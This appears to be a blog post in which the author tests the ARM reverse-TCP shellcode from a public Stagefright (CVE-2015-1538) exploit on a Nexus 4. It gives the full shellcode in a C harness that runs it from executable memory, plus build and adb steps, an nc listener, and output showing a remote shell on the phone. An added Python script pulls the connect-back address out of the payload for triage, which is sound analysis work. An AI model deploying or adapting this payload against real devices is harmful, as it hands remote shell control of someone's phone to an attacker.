I recently wanted to check whether the shell reverse tcp payload used in https://github.com/jduck/cve-2015-1538-1/blob/master/Stagefright_CVE-2015-1538-1_Exploit.py works correctly on a Nexus 4 running android-5.1.1_r19.
The test code is here:
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/mman.h>

/* ARM shellcode taken from the Stagefright exploit script; it forks, exits the
 * parent, calls setsid() in the child, connects back to the hard-coded host and
 * port, dup2()s the socket onto stdin/stdout/stderr and execve()s /system/bin/sh. */
const unsigned char payload[] =
// # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
// # fork
"\x02\x70\xa0\xe3"
"\x00\x00\x00\xef"
// # continue if not parent...
"\x00\x00\x50\xe3"
"\x02\x00\x00\x0a"
// # exit parent
"\x00\x00\xa0\xe3"
"\x01\x70\xa0\xe3"
"\x00\x00\x00\xef"
// # setsid in child
"\x42\x70\xa0\xe3"
"\x00\x00\x00\xef"
// # socket/connect/dup2/dup2/dup2
"\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c"
"\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60"
"\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0"
"\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1"
"\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06"
"\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00"
"\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0"
"\xe3\x00\x00\x00\xef"
// # execve(shell, argv, env)
"\x30\x00\x8f\xe2\x04\x40\x24\xe0"
"\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d"
"\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00"
"\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00"
"\xef\x02\x00"
// # Add the connect back host/port 192.168.5.162:33487
"\x82\xcf" "\xc0\xa8\x05\xa2"
// # shell -
"/system/bin/sh\x00\x00"
// # argv -
"sh\x00\x00"
// # env -
"PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00";

int main(int argc, char *argv[])
{
	/* Anonymous RWX mapping so the payload can be copied in and then executed. */
	char *a = mmap(0, sizeof(payload), PROT_READ | PROT_WRITE | PROT_EXEC,
	               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (a == (char *)MAP_FAILED) {
		printf("Failed to mmap payload memory %d(%s)!\n", errno, strerror(errno));
		return 1;
	}
	memcpy(a, payload, sizeof(payload));
	/* Jump into the copied shellcode; it does not return on success. */
	((void (*)(void))a)();
	return 0;
}
```
NOTE: the default IP address and port are 192.168.5.162:33487
The corresponding Android.mk:
```makefile
LOCAL_PATH:= $(call my-dir)
include $(CLEAR_VARS)
LOCAL_MODULE_TAGS := optional
LOCAL_MODULE := shellrevtcp
LOCAL_SRC_FILES:= \
	shell_reverse_tcp.c
LOCAL_CFLAGS := -Wno-unused-parameter
include $(BUILD_EXECUTABLE)
```
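From the triage side, the useful fact about this payload is that its connect-back target sits in a plain `struct sockaddr_in` (AF_INET as a little-endian short, port and address in network byte order) immediately before the shell path, so a blob can be parsed for its host and port without disassembling it. The following Python script is an added example, not code from the post or the exploit repository; its sample blob is constructed here from the execve stub and the trailing sockaddr/strings of the payload above.

```python
import re
import socket
import struct

# Constructed sample: the execve stub from the harness above followed by the
# sockaddr_in (AF_INET, port 33487, 192.168.5.162) and the shell/argv/env strings.
SAMPLE = (
    b"\x30\x00\x8f\xe2\x04\x40\x24\xe0"
    b"\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d"
    b"\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00"
    b"\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00"
    b"\xef\x02\x00\x82\xcf\xc0\xa8\x05\xa2"
    b"/system/bin/sh\x00\x00sh\x00\x00"
    b"PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00"
)


def _cstrings(buf, start, count):
    """Read `count` NUL-terminated strings from `start`, skipping the padding
    NULs the payload inserts to keep each string 4-byte aligned."""
    out, pos = [], start
    for _ in range(count):
        end = buf.index(b"\x00", pos)
        out.append(buf[pos:end].decode("ascii"))
        pos = end + 1
        while pos < len(buf) and buf[pos] == 0:
            pos += 1
    return out


def extract_connect_back(blob):
    """Find a sockaddr_in (family 2, non-zero port) that is directly followed by
    an absolute path, i.e. the layout shell_reverse_tcp uses, and return the
    connect-back host/port plus the shell, argv[0] and environment strings."""
    for m in re.finditer(b"\x02\x00", blob):
        off = m.start()
        if off + 8 >= len(blob):
            break
        port = struct.unpack(">H", blob[off + 2:off + 4])[0]
        host = socket.inet_ntoa(blob[off + 4:off + 8])
        if port == 0 or blob[off + 8:off + 9] != b"/":
            continue
        shell, argv0, env = _cstrings(blob, off + 8, 3)
        return {"offset": off, "host": host, "port": port,
                "shell": shell, "argv0": argv0, "env": env}
    return None


if __name__ == "__main__":
    r = extract_connect_back(SAMPLE)
    print("connect-back %s:%d (sockaddr at offset %d), shell %s" %
          (r["host"], r["port"], r["offset"], r["shell"]))
```

The same scan can be run over a memory dump or a carved MP4 region to pull the listener address out of a sample without executing it.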
After building, push shellrevtcp to the phone:
```
$ adb push ${OUT}/system/bin/shellrevtcp /data/local/tmp/
```
On the host with IP address 192.168.5.162, run in a terminal:
```
hzak@B85RPI:/data/mako-5.1.1_r19/system/shellrevtcp$ nc -l 33487 -v
Listening on [0.0.0.0] (family 0, port 33487)
```
Then run /data/local/tmp/shellrevtcp inside an adb shell (you have to start adb shell first; running adb shell /data/local/tmp/shellrevtcp directly fails). After that you can execute shell commands from the terminal used above, for example:
```
hzak@B85RPI:/data/mako-5.1.1_r19/system/shellrevtcp$ nc -l 33487 -v
Listening on [0.0.0.0] (family 0, port 33487)
Connection from [192.168.5.141] port 33487 [tcp/*] accepted (family 2, sport 58808)
ls -l
__bionic_open_tzdata_path: ANDROID_ROOT not set!
__bionic_open_tzdata_path: ANDROID_ROOT not set!
__bionic_open_tzdata_path: ANDROID_ROOT not set!
drwxr-xr-x root     root              2016-06-10 13:38 acct
drwxrwx--- system   cache             2016-03-08 03:52 cache
lrwxrwxrwx root     root              1970-01-01 00:00 charger -> /sbin/healthd
dr-x------ root     root              2016-06-10 13:38 config
lrwxrwxrwx root     root              2016-06-10 13:38 d -> /sys/kernel/debug
drwxrwx--x system   system            2016-06-10 13:46 data
-rw-r--r-- root     root          329 1970-01-01 00:00 default.prop
drwxr-xr-x root     root              2016-06-10 13:39 dev
lrwxrwxrwx root     root              2016-06-10 13:38 etc -> /system/etc
...
```
References:
- https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/
- https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
- https://github.com/jduck/cve-2015-1538-1/blob/master/Stagefright_CVE-2015-1538-1_Exploit.py
- https://www.blackhat.com/docs/us-15/materials/us-15-Drake-Stagefright-Scary-Code-In-The-Heart-Of-Android.pdf
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1538
- http://googleprojectzero.blogspot.com/2015/09/stagefrightened.html